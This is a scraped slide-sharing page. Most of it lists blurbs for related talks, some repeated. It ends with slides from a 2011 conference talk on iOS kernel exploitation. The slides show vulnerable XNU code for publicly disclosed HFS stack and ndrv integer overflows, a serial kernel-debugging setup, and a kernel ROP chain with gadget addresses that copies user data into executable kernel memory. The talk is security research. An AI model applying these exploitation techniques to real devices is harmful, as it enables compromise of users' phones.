Exploiting the iOS Kernel
The iPhone user land is locked down very tightly by kernel level protections. Therefore any sophisticated attack has to include a kernel exploit in order to completely compromise the device. Because of this our previous session titled "Targeting the iOS Kernel" already discussed how to reverse the iOS kernel in order to find kernel security vulnerabilities. Exploitation of iOS kernel vulnerabilities has not been discussed yet.
This session will introduce the audience to kernel level exploitation of iPhones. With the help of previously disclosed kernel vulnerabilities the exploitation of uninitialized kernel variables, kernel stack buffer overflows, out of bound writes and kernel heap buffer overflows will be discussed.
Furthermore the kernel patches applied by iPhone jailbreaks will be discussed in order to understand how certain security features are deactivated. A tool will be released that allows to selectively de-activate some of these kernel patches for more realistic exploit tests.
Ruxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and EntitlementsStefan Esser
iOS 8 specific security talk given at Ruxcon 2014 security conference. Includes description of kernel vulnerability used to break KASLR in Pangu 7.1 + TAIG 8.1.1 jailbreaks.
Summer training report on Android OS
This ppt covers almost all topics related to android including Introduction, History, Version, Architecture, Application Development, Code implementation and execution, Advantages and disadvantages.
Ruxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and EntitlementsStefan Esser
iOS 8 specific security talk given at Ruxcon 2014 security conference. Includes description of kernel vulnerability used to break KASLR in Pangu 7.1 + TAIG 8.1.1 jailbreaks.
Summer training report on Android OS
This ppt covers almost all topics related to android including Introduction, History, Version, Architecture, Application Development, Code implementation and execution, Advantages and disadvantages.
Customizing AOSP For Different Embedded Devices And Integration at Applicatio...ijafrc
Android is a software stack that includes operating system, middle ware, applications for the development of devices. Android has evolved greatly and user experience in addition to consumer level efficiency along with integration of android powered devices also expanded. Because of its core aspects like open source nature and architectural modal it is becoming more innovative operating system. Android is being integrated and ported to various embedded devices this includes enterprise desktop IP phones, cameras, modem, sensors, and set-up boxes and automotive. One major advantage of using android framework beyond the mobile devices is the android applications can talk to the functionality of all these devices powered by android and developers need not to write several applications for different embedded systems. This paper looks at the challenges in android migration to the different embedded platforms and porting issues. Here we presented description of preparing and building AOSP in local environment and implementation with Programming for integrating user applications in android build system permanently.
With the big delays in the time it takes until an iOS jailbreak is public and stable, it is often not possible to test mobile apps in the latest iOS version. Occasionally customers might also provide builds that only work in iOS versions for which no jailbreak is available. On Android the situation is better, but there can also be problems to root certain phone models. These trends make security testing of mobile apps difficult. This talk will cover approaches to defeat common security mechanisms that must be bypassed in the absence of root/jailbreak.
Demos: http://www.youtube.com/playlist?list=PL3SqEmKhsxzzUIG1oIOUw3UeK0euTSTNH
Chess is a complex game: The number of permutations is just too great to compute the best possible move during a game. This is similar to pen testing in that we also have too many vulnerabilities to find and choose from not only on a 1 by 1 basis but also how we would chain them together like a real attacker.
Chess players must analyse efficiently to beat time constraints like pentesters but unlike pentesters they have been doing this for a long time.
The purpose of this talk is to expose the techniques chess players have been using for centuries and to illustrate how we can learn from these and apply them to pen testing. The talk will behighly practical and will show how these techniques have been incorporated into OWTF, not only with screenshots but also demos.
Have you ever had to spend valuable time in the middle of a test to prepare something you could have prepared in advance? Did you ever analyse a vulnerability/attack-path in depth only to find a significantly easier to exploit vulnerability hours/days after? Pen testing is very similar to playing chess: It is easy to get carried on and waste valuable analysis time on a line of attack that is just not the best option. Maybe mistakes like this will be a bit less likely after attending this talk.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
Regardless on how sophisticated your framework is, how many layers of firewalls and mitigation techniques that are put in place, there's a common weakness that often gets overlooked: the insecure direct object reference. The flaw exist everywhere: WordPress with username enumeration issues. Twitter where remote attackers could delete credit cards for the ad service and to OculusVR with a horizontal privilege escalation vulnerability which got disclosed recently.
Mobile is booming, and that's a good thing! But with multiple operating systems and tens of thousands of devices on the market, how can you ensure your app delights your users everywhere, every time, at every turn?
This paper is a compilation of 10 innovation predictions for the world in 2025, based on research done by Thomson Reuters analysts. The aim of this project was to identify 10 technologies of tomorrow that will be in use in 2025 based on research and development currently identifiable in the literature of today - both scientific literature and published patents.
Customizing AOSP For Different Embedded Devices And Integration at Applicatio...ijafrc
Android is a software stack that includes operating system, middle ware, applications for the development of devices. Android has evolved greatly and user experience in addition to consumer level efficiency along with integration of android powered devices also expanded. Because of its core aspects like open source nature and architectural modal it is becoming more innovative operating system. Android is being integrated and ported to various embedded devices this includes enterprise desktop IP phones, cameras, modem, sensors, and set-up boxes and automotive. One major advantage of using android framework beyond the mobile devices is the android applications can talk to the functionality of all these devices powered by android and developers need not to write several applications for different embedded systems. This paper looks at the challenges in android migration to the different embedded platforms and porting issues. Here we presented description of preparing and building AOSP in local environment and implementation with Programming for integrating user applications in android build system permanently.
With the big delays in the time it takes until an iOS jailbreak is public and stable, it is often not possible to test mobile apps in the latest iOS version. Occasionally customers might also provide builds that only work in iOS versions for which no jailbreak is available. On Android the situation is better, but there can also be problems to root certain phone models. These trends make security testing of mobile apps difficult. This talk will cover approaches to defeat common security mechanisms that must be bypassed in the absence of root/jailbreak.
Demos: http://www.youtube.com/playlist?list=PL3SqEmKhsxzzUIG1oIOUw3UeK0euTSTNH
Chess is a complex game: The number of permutations is just too great to compute the best possible move during a game. This is similar to pen testing in that we also have too many vulnerabilities to find and choose from not only on a 1 by 1 basis but also how we would chain them together like a real attacker.
Chess players must analyse efficiently to beat time constraints like pentesters but unlike pentesters they have been doing this for a long time.
The purpose of this talk is to expose the techniques chess players have been using for centuries and to illustrate how we can learn from these and apply them to pen testing. The talk will behighly practical and will show how these techniques have been incorporated into OWTF, not only with screenshots but also demos.
Have you ever had to spend valuable time in the middle of a test to prepare something you could have prepared in advance? Did you ever analyse a vulnerability/attack-path in depth only to find a significantly easier to exploit vulnerability hours/days after? Pen testing is very similar to playing chess: It is easy to get carried on and waste valuable analysis time on a line of attack that is just not the best option. Maybe mistakes like this will be a bit less likely after attending this talk.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
Regardless on how sophisticated your framework is, how many layers of firewalls and mitigation techniques that are put in place, there's a common weakness that often gets overlooked: the insecure direct object reference. The flaw exist everywhere: WordPress with username enumeration issues. Twitter where remote attackers could delete credit cards for the ad service and to OculusVR with a horizontal privilege escalation vulnerability which got disclosed recently.
Mobile is booming, and that's a good thing! But with multiple operating systems and tens of thousands of devices on the market, how can you ensure your app delights your users everywhere, every time, at every turn?
This paper is a compilation of 10 innovation predictions for the world in 2025, based on research done by Thomson Reuters analysts. The aim of this project was to identify 10 technologies of tomorrow that will be in use in 2025 based on research and development currently identifiable in the literature of today - both scientific literature and published patents.
A compilation of stats and facts which tells the story of how India’s online space has evolved in the past quarter. The report shares some insights into connectivity, internet and social media usage, mobile market details and other digital trends. It would serve as a flashback to the past year - 2014 - along with certain predictions that will dominate the online world in 2015.
A compilation of stats and facts which tells the story of how India’s online space has evolved in the past quarter. The report shares some insights into connectivity, internet and social media usage, mobile market details and other digital trends.
A talk I gave at Hackware v1.9 about my experience in using an Intel Edison in my company's product.
The video of my talk can be found here: https://engineers.sg/v/828
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelStefan Esser
Targeting the iOS Kernel
Although the iPhone user land is locked down very tightly, previous talks about iPhone security have concentrated on user land attacks only. Therefore demonstrated exploit payloads have been very limited in what they can do or cannot do. More complicated work like user land rootkits or the addition of ASLR protection therefore relied entirely on kernel exploitation help from the jailbreaking community.
This presentation will introduce the audience into finding security bugs in iOS kernelspace and how this is different from hunting kernel bugs in Mac OS X. Reverse engineering will be used to extract a lot of information from the kernelcache and then this information is used to enumerate the kernel's attack surface and the corresponding code is located. In addition to that the secrets of activating the iOS internal kernel debugger will be revealed and it will be demonstrated by debugging a previous disclosed iOS kernel exploit.
Pressetation about how to find vulnerabilities and do reversing to the iOS Operating System. The author is Steffan Esser and the talk was delivered in SyScan 2011 in Singapur
Reverse Engineering the TomTom Runner pt. 1 Luis Grangeia
A hacker likes computers for the same reason that a child likes legos: both allow the creation of something new. However the growing trend has been to 'close up' general purpose computing into devices that serve a narrow purpose. It's been happening with games consoles, routers, smartphones, smart TV's and more recently, smartwatches. A hacker will face this trend as an additional challenge and will be even more motivated to gain control over the device.
This talk is a journey to the world of 'reverse engineering' of a device of the "Internet of Things", in this case a Tomtom Runner sports watch. The author has little previous experience in reverse engineering of embedded systems, so the talk aims to serve as an introduction to this topic, what motivations and what kind of approaches may be tried.
Presented in September 2015 at "Confraria de Segurança da Informação" in Lisbon
Slides for a full talk I gave at iOS Dev Scout about how to do rudimentary BLE localisation using a couple of Raspberry Pis as beacons.
An overview of this was given as a lightning talk at iOS Conf SG 2017.
Source code can be found here:
https://github.com/yeokm1/ble-localiser
Edje Project: The Software Foundation for IoT DevicesMicroEJ
The Eclipse IoT Edje project includes a Hardware Abstraction Java API for the IoT embedded systems. It targets resource-constrained microcontrollers, provides ready-to-use software packages for target hardware, and defines a modular and easy to port framework.
More about Edje Project: http://www.microej.com/portfolio-item/microej-present-eclipse-edje-open-source-iot-project-eclipsecon/
Tizen:Common is a cross profile and cross architecture system that
aims to become the OS of everything. This presentation will discuss
its porting to open source hardware devices with ARM or Intel
processors and the stage of the open source project Tizen-sunxi. It
will provide guidelines for building Tizen:Common image from scratch
and booting it on x86 systems or ARM devices. Sunxi devices which
represent the family of ARM SoCs from the Chinese company Allwinner
Technology will be used to demonstrate how to build tizen by your own
and dual boot it on a tablet shipped with another OS. Allwinner chips
are preferred for low budget tablets and single board computers such
as open hardware OLinuXino, CubieBoard and Banana Pi. As of today
millions of Sunxi devices exist on the market and a large community of
open source developers support them but they are not the only ones to
hack on.
How to port Tizen:Common to open source hardware devices? Leon Anavi
Tizen:Common is a cross-profile and cross-architecture system that aims to become the OS of everything. This presentation discusses porting to open source hardware devices with ARM or Intel processors and the stage of the open source project Tizen-sunxi.
SyScan360 - Stefan Esser - OS X El Capitan sinking the S\H/IPStefan Esser
With the release of OS X El Capitan Apple has introduced a new protection to the OS X kernel called System Integrity Protection (SIP). The purpose of this new mitigation is to lock down the system from attackers who have already gained root access.
In the first part of this session we will elaborate what exactly SIP tries to protect against and how its features are implemented and integrated into the kernel. In the second part of this presentation we will then dive into obvious shortcomings of this implementation and discuss design weaknesses and actual bugs that allow to bypass it. All weaknesses will be demoed to the audience.
SyScan 2015 Bonus Slides - death of the vmsize=0 dyld trickStefan Esser
During my talk at SyScan 2015 i promised to disclose among all the fail of Apple how their patches for "Patient ALPHA" actually killed a previously unknown 0-day incomplete code signing vulnerability that was just waiting to be used in the next jailbreak.
SyScan 2015 - iOS 678 Security - A Study in FailStefan Esser
Talk from SyScan 2015 about Apple Security failing to patch vulnerabilities over and over again, because they have apparently no QA at all on security patches.
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterStefan Esser
With the release of iOS6 Apple has cracked down on all published iOS exploitation information. It seems that nearly every trick and technique discussed in talks/papers or books of the last years has been taken care of by Apple in order to stop exploitation for jailbreaking or more malicious purposes.
This talk will tie in with the iOS6 Security talk by Azimuth Security that discussed various kernel hardenings performed by Apple, and discuss further security relevant changes in iOS 6.1 kernel affecting kernel exploitation and user space exploitation.
SyScan Singapore 2010 - Returning Into The PHP-InterpreterStefan Esser
Among web application security experts there is the popular believe that low level vulnerabilities like buffer overflows and other kinds of memory corruption vulnerabilities do not matter for web application security. In addition to that the increasing use of exploit mitigation techniques on modern web servers make many believe that exploiting remote memory corruptions in webserver software is over. But is it really?
This talk will introduce the idea of returning into the PHP interpreter from memory corruption vulnerabilities and discuss the requirements and feasibility of different ways to do that. This idea will then be applied to a yet undisclosed PHP vulnerability, which is exposed to remote attackers in several widespread PHP applications. Different aspects of this vulnerability will be analyzed and it will be explained how they can be abused in remote information leak and memory corruption exploits. The creation of such a remote code execution exploit will then be detailed step by step.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
2. Who am I?
Stefan Esser
• from Cologne / Germany
• in information security since 1998
• PHP core developer since 2001
• Month of PHP Bugs and Suhosin
• recently focused on iPhone security (ASLR, jailbreak)
• founder of SektionEins GmbH
• currently also working as independent contractor
Stefan Esser • iOS Kernel Exploitation • August 2011 • 2
5. Mac OS X vs. iOS (I)
• iOS is based on XNU like Mac OS X
• exploitation of kernel vulnerabilities is therefore similar
• there are no mitigations inside the kernel e.g. heap/stack canaries
• some kernel bugs can be found by auditing the open source XNU
• some bugs are only/more interesting on iOS
Stefan Esser • iOS Kernel Exploitation • August 2011 • 5
6. Mac OS X vs. iOS (II)
OS X iOS
user-land dereference bugs are not user-land dereference bugs are partially
exploitable exploitable
privilege escalation to root privilege escalation to root only beginning
usually highest goal (need to escape sandbox everywhere)
memory corruptions or code exec in kernel memory corruption or code exec inside
nice but usually not required kernel always required
kernel exploits only trigger-able as root are kernel exploits only trigger-able as root
not interesting interesting for untethering exploits
Stefan Esser • iOS Kernel Exploitation • August 2011 • 6
7. Types of Kernel Exploits
normal kernel exploits
• privilege escalation from “mobile“ user in applications
• break out of sandbox
• disable code-signing and RWX protection for easier infection
• must be implemented in 100% ROP
untethering exploits
• kernel exploit as “root“ user during boot sequence
• patch kernel to disable all security features in order to jailbreak
• from iOS 4.3.0 also needs to be implemented in 100% ROP
Stefan Esser • iOS Kernel Exploitation • August 2011 • 7
8. Getting Started
• Best test-device: iPod 4G
• State: jailbroken or development phone
• Software: grab iOS firmware and decrypt kernel
• Testing method: panic logs / kernel debugger
Stefan Esser • iOS Kernel Exploitation • August 2011 • 8
10. iOS Kernel Debugging
• no support for kernel level debugging by iOS SDK
• developers are not supposed to do kernel work anyway
• strings inside kernelcache indicate the presence of debugging code
• boot arg “debug“ is used
• and code of KDP seems there
Stefan Esser • iOS Kernel Exploitation • August 2011 • 10
11. KDP on iOS 4
• the OS X kernel debugger KDP is obviously inside the iOS kernel
• but KDP does only work via ethernet or serial interface
• how to communicate with KDP?
• the iPhone / iPad do not have ethernet or serial, do they?
Stefan Esser • iOS Kernel Exploitation • August 2011 • 11
12. iPhone Dock Connector (Pin-Out)
PIN Desc
1,2 GND
3 Line Out - R+
4 Line Out - L+
5 Line In - R+
6
8
Line In - L+
Video Out
iPhone Dock Connector has PINs for
9 S-Video CHR Output
10
11
S-Video LUM Output
GND
- Line Out / In
12 Serial TxD
13
14
Serial RxD
NC
- Video Out
15,16 GND
17 NC - USB
18 3.3V Power
19,20 12V Firewire Power
21 Accessory Indicator/Serial Enable - FireWire
22 FireWire Data TPA-
23 USB Power 5 VDC
24 FireWire Data TPA+ - Serial
25 USB Data -
26 FireWire Data TPB-
27 USB Data +
28 FireWire Data TPB+
29,30 GND
Stefan Esser • iOS Kernel Exploitation • August 2011 • 12
13. USB Serial to iPhone Dock Connector
2 x mini-USB-B to USB-A cable
470kΩ resistor
Breakout Board
FT232RL USB to Serial
PodGizmo Connector
Stefan Esser • iOS Kernel Exploitation • August 2011 • 13
14. Ingredients (I)
• 470 kΩ resistor
• used to bridge pin 1 and 21
• activates the UART
• costs a few cents
Stefan Esser • iOS Kernel Exploitation • August 2011 • 14
15. Ingredients (II)
• PodBreakout
• easy access to dock connector pins
• some revisions have reversed pins
• even I was able to solder this
• about 12 EUR
Stefan Esser • iOS Kernel Exploitation • August 2011 • 15
16. Ingredients (III)
• FT232RL Breakout Board
• USB to Serial Convertor
• also very easy to solder
• about 10 EUR
Stefan Esser • iOS Kernel Exploitation • August 2011 • 16
17. Ingredients (IV)
• USB cables
• type A -> mini type B
• provides us with wires and
connectors
• costs a few EUR
Stefan Esser • iOS Kernel Exploitation • August 2011 • 17
18. Final USB and USB Serial Cable
• attaching a USB type A connector to the USB pins is very useful
• we can now do SSH over USB
• and kernel debug via serial line at the same time
Stefan Esser • iOS Kernel Exploitation • August 2011 • 18
19. GDB and iOS KDP
• GDB coming with the iOS SDK has ARM support
• it also has KDP support
• however it can only speak KDP over UDP
• KDP over serial is not supported
Stefan Esser • iOS Kernel Exploitation • August 2011 • 19
20. KDP over serial
• KDP over serial is sending fake ethernet UDP over serial
• SerialKDPProxy by David Elliott is able to act as serial/UDP proxy
$ SerialKDPProxy /dev/tty.usbserial-A600exos
Opening Serial
Waiting for packets, pid=362
^@AppleS5L8930XIO::start: chip-revision: C0
AppleS5L8930XIO::start: PIO Errors Enabled
AppleARMPL192VIC::start: _vicBaseAddress = 0xccaf5000
AppleS5L8930XGPIOIC::start: gpioicBaseAddress: 0xc537a000
AppleARMPerformanceController::traceBufferCreate: _pcTraceBuffer: 0xcca3a000 ...
AppleS5L8930XPerformanceController::start: _pcBaseAddress: 0xccb3d000
AppleARMPerformanceController configured with 1 Performance Domains
AppleS5L8900XI2SController::start: i2s0 i2sBaseAddress: 0xcb3ce400 i2sVersion: 2
...
AppleS5L8930XUSBPhy::start : registers at virtual: 0xcb3d5000, physical: 0x86000000
AppleVXD375 - start (provider 0x828bca00)
AppleVXD375 - compiled on Apr 4 2011 10:19:48
Stefan Esser • iOS Kernel Exploitation • August 2011 • 20
21. Activating KDP on the iPhone
• KDP is only activated if the boot-arg “debug“ is set
• boot-args can be set with e.g. redsn0w 0.9.8b4
• or faked with a custom kernel
• patch your kernel to get into KDP anytime (e.g. breakpoint in unused syscall)
Name Value Meaning
DB_HALT 0x01 Halt at boot-time and wait for debugger attach.
DB_KPRT 0x08 Send kernel debugging kprintf output to serial port.
... ... Other values might work but might be complicated to use.
Stefan Esser • iOS Kernel Exploitation • August 2011 • 21
22. Using GDB...
$ /Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/gdb -arch armv7
kernelcache.iPod4,1_4.3.2_8H7.symbolized
GNU gdb 6.3.50-20050815 (Apple version gdb-1510) (Fri Oct 22 04:12:10 UTC 2010)
...
(gdb) target remote-kdp
(gdb) attach 127.0.0.1
Connected.
(gdb) i r
r0 0x0
0
r1 0x1
1
r2 0x0
0
r3 0x1
1
r4 0x0
0
r5 0x8021c814 -2145269740
r6 0x0
0
r7 0xc5a13efc -979288324
r8 0x0
0
r9 0x27 39
r10 0x0
0
r11 0x0
0
r12 0x802881f4 -2144828940
sp 0xc5a13ee4 -979288348
lr 0x8006d971 -2147034767
pc 0x8006e110 -2147032816
Stefan Esser • iOS Kernel Exploitation • August 2011 • 22
24. HFS Legacy Volume Name Stack Buffer Overflow
• Credits: pod2g
• triggers when a HFS image with overlong volume name is mounted
• stack based buffer overflow in a character conversion routine
• requires root permissions
• used to untether iOS 4.2.1 - 4.2.8
Stefan Esser • iOS Kernel Exploitation • August 2011 • 24
25. HFS Legacy Volume Name Stack Buffer Overflow
int mac_roman_to_unicode(const Str31 hfs_str, UniChar *uni_str,
__unused u_int32_t maxCharLen, u_int32_t *unicodeChars)
{
...
p = hfs_str; maxCharLen parameter
available but unused
u = uni_str;
*unicodeChars = pascalChars = *(p++); /* pick up length byte */
while (pascalChars--) { loop counter
c = *(p++); is attacker supplied
if ( (int8_t) c >= 0 ) { /* check if seven bit ascii */
*(u++) = (UniChar) c; /* just pad high byte with zero */
} else { /* its a hi bit character */
UniChar uc; data is copied/encoded
without length check
c &= 0x7F;
*(u++) = uc = gHiBitBaseUnicode[c];
...
}
}
...
Stefan Esser • iOS Kernel Exploitation • August 2011 • 25
26. Legacy HFS Master Directory Block
/* HFS Master Directory Block - 162 bytes */
/* Stored at sector #2 (3rd sector) and second-to-last sector. */
struct HFSMasterDirectoryBlock {
u_int16_t drSigWord; /* == kHFSSigWord */
u_int32_t drCrDate; /* date and time of volume creation */
u_int32_t drLsMod; /* date and time of last modification */
u_int16_t drAtrb; /* volume attributes */
u_int16_t drNmFls; /* number of files in root folder */
u_int16_t drVBMSt; /* first block of volume bitmap */
u_int16_t drAllocPtr; /* start of next allocation search */
u_int16_t drNmAlBlks; /* number of allocation blocks in volume */
u_int32_t drAlBlkSiz; /* size (in bytes) of allocation blocks */
u_int32_t drClpSiz; /* default clump size */
u_int16_t drAlBlSt; /* first allocation block in volume */
u_int32_t drNxtCNID; /* next unused catalog node ID */
u_int16_t drFreeBks; /* number of unused allocation blocks */
u_int8_t drVN[kHFSMaxVolumeNameChars + 1]; /* volume name */
u_int32_t drVolBkUp; /* date and time of last backup */
u_int16_t drVSeqNum; /* volume backup sequence number */
...
Stefan Esser • iOS Kernel Exploitation • August 2011 • 26
33. Calling Function
int
hfs_to_utf8(ExtendedVCB *vcb, const Str31 hfs_str, ...)
{
int error;
UniChar uniStr[MAX_HFS_UNICODE_CHARS];
ItemCount uniCount;
size_t utf8len;
hfs_to_unicode_func_t hfs_get_unicode = VCBTOHFS(vcb)->hfs_get_unicode;
error = hfs_get_unicode(hfs_str, uniStr, MAX_HFS_UNICODE_CHARS, &uniCount);
if (uniCount == 0)
error = EINVAL;
if (error == 0) {
error = utf8_encodestr(uniStr, uniCount * sizeof(UniChar), dstStr, &utf8len, maxDstLen , ':', 0);
...
Stefan Esser • iOS Kernel Exploitation • August 2011 • 33
34. Calling Function (II)
buffer that is overflown
Text
call to
mac_roman_to_unicode()
should be 0
to exit function
Stefan Esser • iOS Kernel Exploitation • August 2011 • 34
37. From Overwritten PC to Code Execution
• once we control PC we can jump anywhere in kernel space
• in iOS a lot of kernel memory is executable
• challenge is to put code into kernel memory
• and to know its address
• nemo‘s papers already show ways to do this for OS X
Stefan Esser • iOS Kernel Exploitation • August 2011 • 37
38. Kernel Level ROP
802D2300 RWX page in kernel
xxx r7
xxx r4
__text:80033C08 BLX R4
80033C08 gadget 2 __text:80033C0A POP {R4,R7,PC}
xxx r7
80067C60 copyin
400 length
src in
20000000 user space
802D2300 RWX page in kernel
803F5BC2 gadget 1 __text:803F5BC2 POP {R0-R2,R4,R7,PC}
• kernel level ROP very attractive because limited amount of different iOS kernel versions
• just copy data from user space to kernel memory
• and return into it
Stefan Esser • iOS Kernel Exploitation • August 2011 • 38
39. Back To Our Demo Overflow
• previous methods not feasible in our situation
• HFS volume name overflow is a unicode overflow
• conversion routine cannot create addresses pointing to kernel space
(>= 0x80000000 & <= 0x8FFFFFFF)
• feasibility of partial address overwrite not evaluated
➡ this is iOS not Mac OS X => we can return to user space memory
Stefan Esser • iOS Kernel Exploitation • August 2011 • 39
40. Returning into User Space Memory
• unicode overflow allows us to return to 0x010000 or 0x010001
• exploiting Mac OS X binary needs to map executable memory at this address
• exploit can then mlock() the memory
• and let the kernel just return to this address
Stefan Esser • iOS Kernel Exploitation • August 2011 • 40
42. ndrv_setspec() Integer Overflow Vulnerability
• Credits: Stefan Esser
• inside the NDRV_SETDMXSPEC socket option handler
• triggers when a high demux_count is used
• integer overflow when allocating kernel memory
• leads to a heap buffer overflow
• requires root permissions
• used to untether iOS 4.3.1 - 4.3.3
Stefan Esser • iOS Kernel Exploitation • August 2011 • 42
43. ndrv_setspec() Integer Overflow Vulnerability
bzero(&proto_param, sizeof(proto_param)); user controlled
demux_count
proto_param.demux_count = ndrvSpec.demux_count;
/* Allocate storage for demux array */
MALLOC(ndrvDemux, struct ndrv_demux_desc*, proto_param.demux_count *
sizeof(struct ndrv_demux_desc), M_TEMP, M_WAITOK);
if (ndrvDemux == NULL)
return ENOMEM; integer multiplication
with potential overflow
/* Allocate enough ifnet_demux_descs */
MALLOC(proto_param.demux_array, struct ifnet_demux_desc*,
sizeof(*proto_param.demux_array) * ndrvSpec.demux_count,
M_TEMP, M_WAITOK);
if (proto_param.demux_array == NULL)
error = ENOMEM;
if (error == 0) same integer
overflow
{
therefore THIS is
/* Copy the ndrv demux array from userland */ NOT overflowing
error = copyin(user_addr, ndrvDemux,
ndrvSpec.demux_count * sizeof(struct ndrv_demux_desc));
ndrvSpec.demux_list = ndrvDemux;
}
Stefan Esser • iOS Kernel Exploitation • August 2011 • 43
